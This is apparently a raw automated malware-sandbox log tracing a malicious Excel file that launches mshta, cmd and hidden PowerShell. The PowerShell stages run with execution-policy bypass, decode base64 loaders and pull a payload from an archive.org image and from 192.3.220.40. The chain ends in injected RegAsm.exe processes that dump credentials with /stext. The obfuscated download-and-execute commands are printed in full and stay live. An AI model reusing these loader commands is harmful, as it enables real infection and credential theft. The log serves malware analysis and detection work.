                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,30_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,21_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,21_2_00413D4C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,21_2_0040B58D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,30_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\58430000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA7F1.tmp
                    Source: QPS-36477.xlsOLE indicator, Workbook stream: true
                    Source: 58430000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........Q......}..w.............-X.....RVnk......W.....(.P.............<.......X...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Q..............0..=.....Wd.....}..w............@E......^...............(.P.............<.......x...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Q.......................Wd.....}..w............@E......^...............(.P.............<.......x...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...e.....}..w.............................1......(.P..............3......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................e.....}..w......e......................1......(.P.....`.......8.......................................
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: QPS-36477.xlsReversingLabs: Detection: 18%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_23-33280
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
